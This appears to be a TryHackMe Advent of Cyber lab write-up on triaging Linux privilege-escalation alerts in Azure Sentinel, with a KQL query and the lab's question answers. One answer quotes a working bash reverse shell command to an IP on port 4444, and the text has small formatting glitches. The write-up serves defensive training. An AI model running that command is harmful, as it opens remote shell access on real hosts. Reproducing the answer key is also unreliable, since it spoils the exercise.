Access the room: https://tryhackme.com/room/azuresentinel-aoc2025-a7d3h9k0p2
When alerts flood in, SOC analysts cannot open everything blindly — triage is essential.
- Severity: How urgent is it?
- Timestamp & frequency: Is activity ongoing or repeated?
- Attack stage: Recon → Access → PrivEsc → Persistence → Exfiltration
- Affected asset: Which machine/user/resource is impacted?
These 4 factors guide analysts to focus on real threats and deprioritise noise.
Inside Azure Sentinel:
- View incidents in Sentinel → Threat Management → Incidents
- Focus on High Severity alerts
- Investigate metadata:
- Number of events
- Entities involved
- MITRE tactic (e.g., PrivEsc)
- Open View full details
- Check:
- Timeline
- Similar incidents
- Evidence (command executions, auth logs, kernel actions)
Example high-severity alert investigated:
Linux PrivEsc – Kernel Module Insertion
Findings included:
- 3 correlated events
- Same machine involved across PrivEsc alerts
- Progression of attacker behaviour
Multiple alerts across the same host can indicate a multi-stage intrusion:
| Alert | Meaning |
|---|---|
| Root SSH login from external IP | Initial access |
| SUID discovery | Attacker looking for privilege escalation |
| Kernel module insertion | Persistence technique |
This is how SOC analysts reconstruct attack chains.
Switching Sentinel to KQL mode, McSkidy inspected raw logs:
set query_now = datetime(2025-10-30T05:09:25.9886229Z);
Syslog_CL
| where host_s == 'app-02'
| project _timestamp_t, host_s, MessageThis revealed suspicious behaviour:
- Copying
/etc/shadowbackup - Adding user Alice to sudoers
- Modifying backupuser
- Loading kernel module
malicious_mod.ko - Root SSH authentication
Clear signs of PrivEsc & persistence.
Q: How many entities are affected by the Linux PrivEsc - Polkit Exploit Attempt alert?
10
Q: What is the severity of the Linux PrivEsc - Sudo Shadow Access alert?
High
Q: How many accounts were added to the sudoers group in the Linux PrivEsc - User Added to Sudo Group alert?
4
Q: What is the name of the kernel module installed in websrv-01?
malicious_mod.ko
Q: What unusual command was executed within websrv-01 by the ops user?
/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1
Q: What is the source IP of the first successful SSH login to storage-01?
172.16.0.12
Q: What is the external IP that successfully logged in as root to app-01?
203.0.113.45
Q: Aside from backupuser, what user was added to sudoers inside app-01?
deploy.png)